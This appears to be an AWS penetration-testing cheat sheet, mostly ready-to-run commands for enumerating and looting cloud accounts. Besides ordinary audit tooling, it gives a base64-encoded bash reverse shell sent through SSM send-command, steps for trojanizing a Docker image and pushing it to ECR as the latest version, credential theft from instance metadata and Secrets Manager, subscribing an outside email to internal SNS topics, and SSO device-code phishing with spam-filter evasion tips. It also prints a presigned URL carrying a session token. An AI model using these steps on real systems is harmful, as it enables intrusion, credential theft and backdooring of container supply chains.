Authenticate to AWS with:
aws configure
OR use environment variables (if you're authenticating as a resource):
rm -rf ~/.aws   # clear any existing local AWS config/credentials first
export AWS_ACCESS_KEY_ID=<token>
export AWS_SECRET_ACCESS_KEY=<token>
export AWS_SESSION_TOKEN=<token>
OR
aws configure #add access and secret
aws configure set aws_session_token "<session token>"
Unset the variables once you are done:
unset AWS_ACCESS_KEY_ID
unset AWS_SECRET_ACCESS_KEY
unset AWS_SESSION_TOKEN
Prowler
git clone https://github.com/prowler-cloud/prowler.git
cd prowler
pip3 install -r requirements.txt
aws configure
./prowler -M html -V
Scoutsuite
git clone https://github.com/nccgroup/ScoutSuite.git
cd ScoutSuite
pip3 install -r requirements.txt
python3 scout.py aws --report-dir ./scoutsuite_report --debug
python3 scout.py aws --list-services
Check credential strength (MFA, password policy, etc.)
aws iam generate-credential-report
aws iam get-credential-report
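The report content comes back base64-encoded; a quick way to decode it into CSV (the output filename is arbitrary):
aws iam get-credential-report --query Content --output text | base64 -d > credential-report.csv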
Dump all users, groups, roles, and policies (look for roles you can assume):
aws iam get-account-authorization-details
Confused Deputy
Look for roles whose trust policies allow another account to assume them without an ExternalId condition (the classic confused deputy setup):
aws iam get-account-authorization-details
S3
URL Structure
http://[bucketname].s3-website-[region].amazonaws.com/
If you know an organization’s main domain name or naming convention, you can guess the names of potential S3 buckets. It’s a common practice to use predictable naming patterns
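A minimal sketch for testing guessed bucket names unauthenticated; the candidate names below are assumptions for a hypothetical target called targetco:
# 404 = bucket does not exist, 403 = exists but not public, 200 = listable
for name in targetco targetco-dev targetco-prod targetco-backups; do
  code=$(curl -s -o /dev/null -w "%{http_code}" "https://$name.s3.amazonaws.com")
  echo "$code $name"
done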
Google Dorks
Using google dorks to find exposed AWS secrets in buckets
site:amazonaws.com inurl:".s3.amazonaws.com/" "<Target_Company>"
site:.s3.amazonaws.com "<Target_Company>"
intitle:index.of.bucket "<Target_Company>"
Third party tools:
Automated bucket discovery
cloud_enum -k samplekeyword -t 10 --disable-azure --disable-gcp
Append --no-sign-request to commands to attempt them without authentication.
aws s3api list-buckets
List objects with AWS CLI
aws s3 ls s3://[bucketname]
Upload objects with AWS CLI
aws s3 cp [localfile] s3://[bucketname]
We sync all bucket objects to local directory:
aws s3 sync s3://[bucketname] .
If your IP is blocked/rate-limited, download objects one at a time with s3api:
aws s3api get-object --bucket [bucketname] --key [objectkey] [localfile]
Other options:
aws s3 mv s3://[bucketname]/test-object localfile
aws s3 cp s3://[bucketname]/test-object localfile
If a bucket exists but reports that it doesn't, your IP has likely been blocklisted; use s3api instead.
If sync is rate-limited, list object versions with s3api:
aws s3api list-object-versions --bucket [bucketname]
If a version is not the latest for a given object, dump all versions of it with a script like the sketch below.
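A rough sketch (bucket name and output directory are placeholders; requires s3:GetObjectVersion, or add --no-sign-request for unauthenticated buckets):
#!/bin/bash
# Download every version of every object in the bucket
BUCKET=[bucketname]
mkdir -p versions
aws s3api list-object-versions --bucket "$BUCKET" \
  --query 'Versions[].[Key,VersionId]' --output text |
while IFS=$'\t' read -r key versionid; do
  # Flatten the key into a filename and keep the version id as a suffix
  aws s3api get-object --bucket "$BUCKET" --key "$key" \
    --version-id "$versionid" "versions/${key//\//_}_${versionid}"
done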
IAM Enumeration
Get user info & account ID
aws sts get-caller-identity
Get more user info:
aws iam get-user --user-name <breached_username>
List inline policies attached directly to the user:
aws iam list-user-policies --user-name <breached_username>
List attached managed policies:
aws iam list-attached-user-policies --user-name <breached_username>
Return a specific inline policy document:
aws iam get-user-policy --user-name <breached_username> --policy-name <policyname>
Automated tools
Pacu
run iam__enum_permissions
Elastic Compute & Elastic Block Storage
List instances
aws ec2 describe-instances
List EBS volumes
aws ec2 describe-volumes
Describe the EBS snapshots you own:
aws ec2 describe-snapshots --region us-east-1 --owner-ids self
Describe snapshots owned by a particular account:
aws ec2 describe-snapshots --region us-east-2 --owner-ids [AWS-ACCOUNT-ID]
List the publicly available EBS snapshots and any others you may have access to:
aws ec2 describe-snapshots --region <region>
Automated with Pacu:
python3 cli.py
import keys
import_keys --all
list modules
list
ebs module
run ebs__enum_volumes_snapshots
Download snapshots with dsnap
dsnap --region us-east-2 list
dsnap --region us-east-2 get <SNAPSHOTID>
Navigate to the downloaded image and mount it with Docker:
sudo IMAGE=<IMG LOCATION> make docker/run
sudo IMAGE=home/cb7247/snap-085d36d72aafac2b4.img make docker/run
Look around the file system and try to find some loot.
If you get access to an EC2 instance, AWS credentials are located in ~/.aws:
cat ~/.aws/config && cat ~/.aws/credentials
If you have an IAM policy that allows you to describe userData on EC2 instances, use a script to pull userData from all of them and check for loot (see the sketch below).
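A rough version of that script (region is an assumption; userData is returned base64-encoded):
#!/bin/bash
# Dump and decode userData for every instance in the region
for id in $(aws ec2 describe-instances --region us-east-1 \
    --query 'Reservations[].Instances[].InstanceId' --output text); do
  echo "===== $id ====="
  aws ec2 describe-instance-attribute --region us-east-1 \
    --instance-id "$id" --attribute userData \
    --query 'UserData.Value' --output text | base64 -d
  echo
done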
SSM Enumeration
Check if you have an IAM policy that allows you to execute shell commands via SSM
aws iam list-attached-user-policies --user-name <USER>
Check a specific policy via its ARN:
aws iam get-policy --policy-arn arn:aws:iam::[AWS-ACCOUNT-ID]:policy/AllowSSMRunShellCommands
The output shows "DefaultVersionId": "v1", the current policy version; query against that version:
aws iam get-policy-version --policy-arn arn:aws:iam::[AWS-ACCOUNT-ID]:policy/AllowSSMRunShellCommands --version-id v1
An EC2 instance ID is listed as a resource in the policy:
arn:aws:ec2:us-east-1:[AWS-ACCOUNT-ID]:instance/i-09b50e5d737869b05
We can look for other "devmachines" (referenced in the description of the initial policy) and query the known instance ID; see the commands below.
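One way to hunt for them, assuming you also have ssm:DescribeInstanceInformation and ec2:DescribeInstances (the tag filter is a guess):
# Instances registered with SSM (candidates for send-command)
aws ssm describe-instance-information --region us-east-1
# Instances with dev-style Name tags
aws ec2 describe-instances --region us-east-1 \
  --filters "Name=tag:Name,Values=*dev*" \
  --query 'Reservations[].Instances[].[InstanceId,Tags]'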
You can launch command execution against the resulting instances via SSM.
SSM Command Execution
aws ssm send-command \
    --instance-ids "instance-ID" \
    --document-name "AWS-RunShellScript" \
    --comment "comments" \
    --parameters '{"commands":["Bash Script Here"]}' \
    --output text
bash -i >& /dev/tcp/10.0.10.100/8443 0>&1
Base64-encode it first to avoid quoting/interpretation issues:
echo "bash -c 'bash -i >& /dev/tcp/10.0.10.47/8443 0>&1'" | base64
aws ssm send-command \
    --instance-ids "i-09b50e5d737869b05" \
    --document-name "AWS-RunShellScript" \
    --comment "ReverseShell" \
    --parameters '{"commands":["echo YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjEwLjEwMC84NDQzIDA+JjEnCg== | base64 -d | bash"]}' \
    --output text
You should get a shell back
If the command fails, learn why with:
aws ssm list-command-invocations \
    --instance-id "i-09b50e5d737869b05" \
    --command-id "cb542971-efb0-4f08-9281-9ca010a4c0ef" \
    --details
Instance Metadata Service (IMDSv1 & IMDSv2)
Check environment variables on any machine you have access to and identify potential metadata endpoints.
IMDSv1
Retrieve the instance’s metadata:
curl http://169.254.169.254/latest/meta-data/
Get the instance’s hostname:
curl http://169.254.169.254/latest/meta-data/hostname
Fetch the instance’s AMI ID:
curl http://169.254.169.254/latest/meta-data/ami-id
Find out the instance type:
curl http://169.254.169.254/latest/meta-data/instance-type
Determine the public IPv4 address assigned to the instance:
curl http://169.254.169.254/latest/meta-data/public-ipv4
Retrieve security groups associated with the instance:
curl http://169.254.169.254/latest/meta-data/security-groups
Acquire the IAM role credentials (if a role is attached to the instance):
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
If the instance has an attached role/policy like AllowEC2ToReadSecrets, grab its credentials and look for loot:
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/AllowEC2ToReadSecrets
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/AllowEC2ToReadSecrets
Secrets Manager
Check if you have Secrets Manager permissions and list the secrets:
aws secretsmanager list-secrets --region us-east-1
Check for secrets:
aws secretsmanager get-secret-value --secret-id <NAME> --region us-east-1
Take note of sensitive ARNs (such as SNS topics, which can send emails and other notifications):
arn:aws:sns:us-east-1:[AWS-ACCOUNT-ID]:Onboarding_New_Internal_Dev_Msg_01
aws secretsmanager list-secrets
Let's read the stored secrets with get-secret-value:
aws secretsmanager get-secret-value --secret-id DataVaultAnalyticaSecretMgr
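To sweep everything in one go, a small loop over list-secrets works (region assumed; binary secrets would need the SecretBinary field instead):
for s in $(aws secretsmanager list-secrets --region us-east-1 \
    --query 'SecretList[].Name' --output text); do
  echo "===== $s ====="
  aws secretsmanager get-secret-value --region us-east-1 \
    --secret-id "$s" --query 'SecretString' --output text
done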
Simple Notification Service
Subscribe with your email to receive inter-org SNS communications (and look for loot):
- You need the SNS Topic ARN
- Subscribe:
- Monitor for emails with loot
arn:aws:sns:us-east-1:[AWS-ACCOUNT-ID]:Onboarding_New_Internal_Dev_Msg_01
aws sns subscribe --topic-arn arn:aws:sns:us-east-1:[AWS-ACCOUNT-ID]:Onboarding_New_Internal_Dev_Msg_01 --region us-east-1 --protocol email --notification-endpoint jake@jacobh.io
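If you still need to find topic ARNs, or want to see who else is subscribed, these calls help (region assumed); the subscription itself must be confirmed from the link that lands in your inbox:
aws sns list-topics --region us-east-1
aws sns list-subscriptions-by-topic --topic-arn arn:aws:sns:us-east-1:[AWS-ACCOUNT-ID]:Onboarding_New_Internal_Dev_Msg_01 --region us-east-1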
Lambda Functions
List lambda functions
aws lambda list-functions
Get more info
aws lambda get-function --function-name cmdchecker-dev-app
Download the function code from the presigned "Location" URL in the output:
curl "https://prod-iad-c1-djusa-tasks.s3.us-east-1.amazonaws.com/snapshots/[AWS-ACCOUNT-ID]/cmdchecker-dev-app-d75e60fd-f173-40e8-a4b9-ae27de4cff0e?versionId=8mSADta7FRIGuKjKwlitnVFmfQagRBYx&X-Amz-Security-Token=IQoJb3JpZ2luX2VjEAMaCXVzLWVhc3QtMSJHMEUCIQDjKthCPRBRi9xj58tji%2FoN2AzYoHX9C%2BPHEzOnvaByfgIgCbHw0shrMZpFf%2F9IltAmem8g5x0uhx297q4dr1apyhAquQUIHBAEGgw0NzkyMzMwMjUzNzkiDFkt4lJL5vU2rwtPtSqWBfESYHMf5G4YxAhWRRRgA7ZK6cfbKpFq0wsKfLkzuPVB2vTeN5i%2BaA6f%2FpJlLKFPR9RzcLNLHMky96sIwkQXR6AM7AcpBPnObKAxyAu3yUPRFBzCGBDdoR9ULjhy%2BqjAcE6f9PeZCFzVwsWfAvepA%2FPgMlUg9wPhMBjrySl07JuEwexUd5M40YDTz%2BfQcmqR48kGgJB12fMPUyIeGhL4LpoZhtnqwwr4dP%2FEV4Cjcg%2FkSc4oDPMVvH7zudgp5McVqYCVtm8QxafuxgZSFs2TKkezBVUOaZWOQOkca0JxJuwm4wftrvPvVTzy58uyOJCUCaRNekfxXBKmzOKLRw1dMJdtWo%2FEzOJjNVXHRPlYInD%2BSDqmI3%2FEbyBvzH7flnbfesnJ6QaAGJyb95mKdvEYZHOJnZE8JnB1uMH7Eu8%2FBt8vjbF1cfxJIDY88AnaVhAmd%2FLntes5XWIyX0SDcqOwOprg2p1bcWIx3PT4rXP9ot58b9nCi%2FlxYjo%2Fr99lit0KWXoxWcx5LBM1UKWNq9G4A8hm5RzEaaAxX8SivzBBPpNvc%2FeqsYXuy9ab5v6M5iuEEcs4FVBm8LDiZWmS%2FrAkvL0PG6k64FkU2qEAJS9KseUXtipJgrPryc0eUgJ5DQ%2B4ztvC%2F0FNUFHS5r2irl6lfxzVjSaMnN7%2BwuAj1Q5CpYwcdChd3SKftkDQwO7eXRrD%2BXSs%2BipElpCJxeg2mp4a0czxFxq9BPdjq%2FIMaZplagN2by8wrj4aLHO07X%2FnD4BbrL98e58yBDSshEv5ZO9Z%2BYfFKlzT3FSwvCU0BYdCdE6uYwkwpJynJRDfIg6A3I9w%2FhaHYCTuVqeo%2FnUzl%2Flb3uuGcgI80E7mdCwm52sif2O6aLseeJeqMKi5uLYGOrEBrYHhJ73o3FVlXF8xXRMuVUTFju%2BFRIehmOnBBErJT%2BMYbtVPoV4wutG1iQLEFizFDhw0%2BGbddBcMtWuDd0ItAQ0sZ5b%2F3VSSYyWAw59RbQo5bqI5tC0yipw1LGXbsC9Oks04FmL%2FRSJ%2FAxmr5lAONXfYOAPT2UUtIjf2nciakBtly3aUnK7FEeTFIhiwnvKrOJWM00qxicaXFnuzrcnyZAia9eOh1M8TSFTHwUFnO1XZ&X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Date=20240827T192212Z&X-Amz-SignedHeaders=host&X-Amz-Expires=600&X-Amz-Credential=ASIAW7FEDUVR3SU7YV2G%2F20240827%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Signature=611c84ee73847ac9b478a62165091aca16d919fea89513e2a946e2d6f48729da" -o lambda.zip
Ravage the code and config files for loot.
Find Lambda execution endpoint
aws lambda get-policy --function-name cmdchecker-dev-app
#OR if you have access to API Gateway run:
aws apigateway get-rest-apis
{
"Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"cmdchecker-dev-AppLambdaPermissionApiGateway-vHNHjx898ROL\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-east-1:[AWS-ACCOUNT-ID]:function:cmdchecker-dev-app\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-east-1:[AWS-ACCOUNT-ID]:rsd847a1e9/*/*\"}}}]}",
"RevisionId": "829c9cea-4255-4785-b318-dd7bd70af3fe"
}
From the output of the first command we can find the details needed to build the exposed URL. The invoke URL is divided into the following parts:
https://[NAME].execute-api.[REGION].amazonaws.com
arn:aws:execute-api:us-east-1:[AWS-ACCOUNT-ID]:rsd847a1e9
From the output "arn:aws:execute-api:us-east-1:[AWS-ACCOUNT-ID]:rsd847a1e9" we can find the name and the region, which are:
- Name: rsd847a1e9
- Region: us-east-1
We can build the function url:
https://rsd847a1e9.execute-api.us-east-1.amazonaws.com
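The invoke URL still needs a stage and resource path appended; if you have apigateway read access, pull them instead of guessing (the rest-api-id comes from the ARN above):
aws apigateway get-stages --rest-api-id rsd847a1e9 --region us-east-1
aws apigateway get-resources --rest-api-id rsd847a1e9 --region us-east-1
# Then: https://rsd847a1e9.execute-api.us-east-1.amazonaws.com/<stage>/<resource-path>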
ECR/EKS
List image repositories
aws ecr describe-repositories
List specific repository info (images)
aws ecr describe-images --repository-name [reponame]
Backdoor an image with dockerscan
git clone https://github.com/cr0hn/dockerscan
cd dockerscan
sudo python3.6 setup.py install
Grab Ubuntu:
docker pull ubuntu:latest
docker save ubuntu:latest -o ubuntu_original
dockerscan image modify trojanize ubuntu_original -l <IP_Addr> -p <PORT> -o alpine_infected
Now we can force our backdoored image to be the latest version in ECR.
Load the trojanized image into Docker if needed (docker load -i alpine_infected), then tag it as :latest:
sudo docker tag alpine_infected:latest [AWS-ACCOUNT-ID].dkr.ecr.us-east-1.amazonaws.com/[REPONAME]:latest
sudo docker images
Before pushing the tagged image to the ECR repository, authenticate to the registry. The aws ecr get-login-password command retrieves an authentication token that Docker can use to log in to the Amazon Elastic Container Registry (ECR):
aws ecr get-login-password --region us-east-1 | sudo docker login --username AWS --password-stdin [AWS-ACCOUNT-ID].dkr.ecr.us-east-1.amazonaws.com
Start a listener on the port used when trojanizing the image:
ncat -nvlp 8989
sudo docker push [AWS-ACCOUNT-ID].dkr.ecr.us-east-1.amazonaws.com/[REPONAME]:latest
Wait for a node to pull the latest image version and run it; you will receive a shell.
When an attacker successfully compromises a Kubernetes environment, their initial command often involves running “env” to inspect environment variables. This is a common first step because, unfortunately, some DevOps practices involve storing sensitive information like cleartext keys directly as environment variables instead of securely managing them in a secret manager.
env
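Narrowing the output helps, and the mounted service account token is worth grabbing too (standard path in Kubernetes pods):
env | grep -iE 'key|secret|token|pass|aws'
cat /var/run/secrets/kubernetes.io/serviceaccount/token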
Phishing via SSO
Get tool
$ python main.py --help
usage: main.py [-h] -u START_URL -r REGION [-i SSO_TOKEN_FILE] [-o OUTPUT_FILE]
optional arguments:
-h, --help show this help message and exit
-u START_URL, --sso-start-url START_URL
AWS SSO start URL. Example: https://mycompany.awsapps.com/start (default: None)
-r REGION, --sso-region REGION
AWS region in which AWS SSO is configured (e.g. us-east-1) (default: None)
-i SSO_TOKEN_FILE, --sso-token-file SSO_TOKEN_FILE
File to read the AWS SSO token from. If provided, no device code URL is generated (default: None)
-o OUTPUT_FILE File to write the retrieved AWS SSO token (default: None)
It will generate a url:
https://device.sso.us-east-1.amazonaws.com/?user_code=PPSR-PVFH
Send URL to victim and wait
In order to avoid your email being sent to the Junk folder, the sender email address should be from one of the following email providers: gmail.com, hotmail.com, hotmail.co.uk, aol.com, protonmail.com, icloud.com, yahoo.com, outlook.com, ymail.com
Wait 5-6 minutes for a response. Once you receive "Successfully retrieved AWS SSO Token", press Enter twice to receive the session and auth tokens.
This token will only be valid for 8 hours
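With the token in hand, the aws sso CLI can enumerate accounts and roles and mint temporary credentials (region and placeholders are assumptions):
aws sso list-accounts --access-token <SSO_TOKEN> --region us-east-1
aws sso list-account-roles --access-token <SSO_TOKEN> --account-id [AWS-ACCOUNT-ID] --region us-east-1
aws sso get-role-credentials --access-token <SSO_TOKEN> --account-id [AWS-ACCOUNT-ID] --role-name <ROLE_NAME> --region us-east-1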